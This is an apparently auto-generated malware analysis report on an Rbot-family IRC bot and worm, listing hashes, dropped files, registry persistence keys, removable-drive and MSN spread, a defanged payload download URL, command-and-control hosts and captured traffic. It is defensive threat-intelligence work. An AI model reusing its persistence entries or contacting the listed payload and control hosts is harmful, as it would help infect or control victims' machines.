Rbot_d7044fa0ef

by malwarelabrobot on April 1st, 2014 in Malware Descriptions.

AutoIt:Injector-GA [Trj] (Avast), Trojan.GenericKD.1576106 (AdAware), mzpefinder_pcap_file.YR, GenericIRCBot.YR, GenericMSNWorm.YR, Rbot.YR, GenericAutorunWorm.YR, BackdoorIRC.YR, Blazebot.YR, GenericProxy.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, Worm, WormAutorun, IRCBot, MSNWorm, Trojan-Proxy


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: d7044fa0efe14eb154da11843477d3df
SHA1: acb19148e9d74f57262a06cb06444aa317becf61
SHA256: a38e003b2c65db4a68a0adf0ee67b96c258364e337c862a5e54243d8b809937a
SSDeep: 12288:zhkDgouVA2nxKkorvdRgQriDwOIxmxiZnYQE7PJcE4adoSH6cEPj4:5RmJkcoQricOIQxiZY1iamSa3Pj4
Size: 771406 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-01-29 23:32:28
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
IRCBot A bot can communicate with command and control servers via IRC channel.
MSNWorm A worm can spread its copies through the MSN Messanger.
Trojan-Proxy This program can launch a proxy server (SOCKS4) on a designated TCP port.


Process activity

The Trojan creates the following process(es):

ooulnvm.exe:316
AUE68.exe:464
skype.exe:984
skype.exe:444
%original file name%.exe:1476
%original file name%.exe:228
msn.exe:1336
msn.exe:204

The Trojan injects its code into the following process(es):

ooulnvm.exe:1592
skype.exe:1292
csrss.exe:268

File activity

The process ooulnvm.exe:316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (116736 bytes)
%Documents and Settings%\%current user%\G73A28.YX3 (92160 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (0 bytes)
%Documents and Settings%\%current user%\G73A28.YX3 (0 bytes)

The process ooulnvm.exe:1592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\X7VALIDZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (12288 bytes)
%WinDir%\skype.exe (530432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\X7VALIDZ\1738599339.ms1[1] (530432 bytes)
%Documents and Settings%\%current user%\Cookies\test@directxex[1].txt (118 bytes)

The process AUE68.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\F26D\msn.exe (904976 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\F26D\__tmp_rar_sfx_access_check_7102750 (0 bytes)

The process skype.exe:1292 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\svchost.exe (528384 bytes)

The process skype.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\AUE68.exe (757524 bytes)

The process %original file name%.exe:1476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%System%\ooulnvm.exe (771406 bytes)

The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\G73A28.YX3 (92160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (116736 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\G73A28.YX3 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (0 bytes)

The process msn.exe:1336 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\A85F69.MS5 (67072 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (68608 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\A85F69.MS5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (0 bytes)

The process msn.exe:204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\csrss.exe (746376 bytes)

Registry activity

The process ooulnvm.exe:316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 6B 6B 7D 45 7F 09 7A 1A 38 D2 EF 2D E9 DA 62"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

The process ooulnvm.exe:1592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\yOLE]
"Supports RAS Connections" = "ooulnvm.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\SYSTEM\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "ooulnvm.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\yOLE]
"Supports RAS Connections" = "ooulnvm.exe"

[HKLM\System\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "ooulnvm.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"Skype.exe" = "Spinetai didel"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 E6 9D BF 2A 9C 3D 37 40 A0 4B 41 40 A5 F4 91"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "ooulnvm.exe"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "ooulnvm.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "ooulnvm.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Supports RAS Connections" = "ooulnvm.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process AUE68.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 D8 54 E7 C8 1D D8 6B F0 76 5E 32 26 8B 60 D8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\F26D]
"msn.exe" = "msn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process skype.exe:1292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB E1 AD E2 0B 9A A9 FC 51 A9 F2 98 1A 82 28 4F"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched" = "%Documents and Settings%\All Users\svchost.exe"

The process skype.exe:984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 01 BF 67 71 68 22 95 00 3A F6 F8 C0 06 E8 56"

The process skype.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE E1 3D 16 6E E6 2B 29 3A 98 4A 27 13 53 A6 CA"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp]
"AUE68.exe" = "AUE68"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:1476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 15 E0 7B CD 03 23 4E AA EB 8C 02 23 36 6E 8E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 3C 37 70 BD 89 87 F9 E5 E7 E6 10 DE F5 B7 CF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

The process msn.exe:1336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E D5 CE 45 BE 91 EC 87 DA 94 08 F9 28 64 96 4D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

The process msn.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 8E CC 11 CB DE D4 E0 49 4E 4A AB 05 D7 AB 28"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe"

Dropped PE files

MD5 File path
0d468d8b2a1f7f599575a60378554192 c:\Documents and Settings\All Users\svchost.exe
1838249f6e218963310b439c330e968f c:\Documents and Settings\test\F26D\msn.exe
846e69454ddca6f801239f0ff1e120be c:\Documents and Settings\test\Local Settings\Temp\AUE68.exe
0d468d8b2a1f7f599575a60378554192 c:\Documents and Settings\test\Local Settings\Temporary Internet Files\Content.IE5\X7VALIDZ\1738599339.ms1[1]
0d468d8b2a1f7f599575a60378554192 c:\WINDOWS\skype.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

A worm can spread its copies through the MSN Messanger.

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3, 3, 8, 1
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 525852 526336 4.63347 61ffce4768976fa0dd2a8f6a97b1417a
.rdata 532480 57280 57344 3.32693 0354bc5f2376b5e9a4a3ba38b682dff1
.data 589824 108376 26624 1.49032 8033f5a38941b4685bc2299e78f31221
.rsrc 700416 16376 16384 3.06916 6c0529185ffae00932f6d33565ffc4db

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
25ead6906ed4c4c9d57568d7cebf8b91

URLs

URL IP
hxxp://directxex.com/uploads/1738599339.ms1.exe?dl=1 108.162.199.96
hxxp://www.whatismyip.com/ 190.93.249.117
hxxp://checkip.dyndns.com/
checkip.dyndns.org 216.146.39.70
vids.p0rn-lover.us 82.145.57.209
videos.p0rn-lover.us 176.31.75.42


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CNC Shadowserver Reported CnC Server IP group 7
ET CHAT IRC PONG response
ET CHAT IRC PING command
ET TROJAN IRC Potential bot update/download via ftp command
ET CHAT IRC authorization message
ET WEB_CLIENT Possible HTTP 403 XSS Attempt (External Source)
ET POLICY Internal Host Retrieving External IP via whatismyip.com - Possible Infection
ET CNC Shadowserver Reported CnC Server IP group 39
ET MALWARE User-Agent (Mozilla/4.0 (compatible))
ET POLICY PE EXE or DLL Windows file download
ET POLICY DynDNS CheckIp External IP Address Server Response
ET CHAT IRC JOIN command
ET CHAT IRC NICK command
ET CHAT IRC USER command
ET CHAT IRC PRIVMSG command

Traffic

GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sat, 22 Mar 2014 11:18:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da6191e9b8143e8df9f92ef6df9da84231395487139700; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 10f1fddf2b9f072b-AMS
830..<html>.<head><title>403 Forbidden</title>
<script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:1395415713,byc:0,owlid:"cf",
bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/ne
xp/dok8v=02fcfa4f56/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"
fcb473feb94cd35c093199b4a1ab2d93b1ddb512-1395487139-1800",zone:"whatis
myip.com",rocket:"a",apps:{"ga_key":{"ua":"UA-4975660-1","ga_bs":"2"}}
}];document.write('<script type="text/javascript" src="//ajax.cloud
flare.com/cdn-cgi/nexp/dok8v=b064e16429/cloudflare.min.js"><' '\
/script>');}}catch(e){};.//]]>.</script>.<script type="
text/javascript">./* <![CDATA[ */.var _gaq = _gaq || [];._gaq.pu
sh(['_setAccount', 'UA-4975660-1']);._gaq.push(['_trackPageview']);..(
function() {.var ga = document.createElement('script'); ga.type = 'tex
t/javascript'; ga.async = true;.ga.src = ('https:' == document.locatio
n.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga
.js';.var s = document.getElementsByTagName('script')[0]; s.parentNode
.insertBefore(ga, s);.})();..(function(b){(function(a){"__CF"in b&&"DJ
S"in b.__CF?b.__CF.DJS.push(a):"addEventListener"in b?b.addEventListen
er("load",a,!1):b.attachEvent("onload",a)})(function(){"FB"in b&&"Even
t"in FB&&"subscribe"in FB.Event&&(FB.Event.subscribe("edge.create",fun
ction(a){_gaq.push(["_trackSocial","facebook","like",a])}),FB.Event.su
bscribe("edge.remove",function(a){_gaq.push(["_trackSocial","faceb

<<< skipped >>>

GET / HTTP/1.1

Host: VVV.whatismyip.com
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sat, 22 Mar 2014 11:19:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=df852822566c087fb00173873c57f03ca1395487139869; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 10f1fde02bcc072b-AMS
830..<html>.<head><title>403 Forbidden</title>
<script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:1395415713,byc:0,owlid:"cf",
bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/ne
xp/dok8v=02fcfa4f56/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"
f6c3f59135c67fcf60ee41f3dfba7593cb660797-1395487140-1800",zone:"whatis
myip.com",rocket:"a",apps:{"ga_key":{"ua":"UA-4975660-1","ga_bs":"2"}}
}];document.write('<script type="text/javascript" src="//ajax.cloud
flare.com/cdn-cgi/nexp/dok8v=b064e16429/cloudflare.min.js"><' '\
/script>');}}catch(e){};.//]]>.</script>.<script type="
text/javascript">./* <![CDATA[ */.var _gaq = _gaq || [];._gaq.pu
sh(['_setAccount', 'UA-4975660-1']);._gaq.push(['_trackPageview']);..(
function() {.var ga = document.createElement('script'); ga.type = 'tex
t/javascript'; ga.async = true;.ga.src = ('https:' == document.locatio
n.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga
.js';.var s = document.getElementsByTagName('script')[0]; s.parentNode
.insertBefore(ga, s);.})();..(function(b){(function(a){"__CF"in b&&"DJ
S"in b.__CF?b.__CF.DJS.push(a):"addEventListener"in b?b.addEventListen
er("load",a,!1):b.attachEvent("onload",a)})(function(){"FB"in b&&"Even
t"in FB&&"subscribe"in FB.Event&&(FB.Event.subscribe("edge.create",fun
ction(a){_gaq.push(["_trackSocial","facebook","like",a])}),FB.Event.su
bscribe("edge.remove",function(a){_gaq.push(["_trackSocial","faceb

<<< skipped >>>

GET / HTTP/1.1
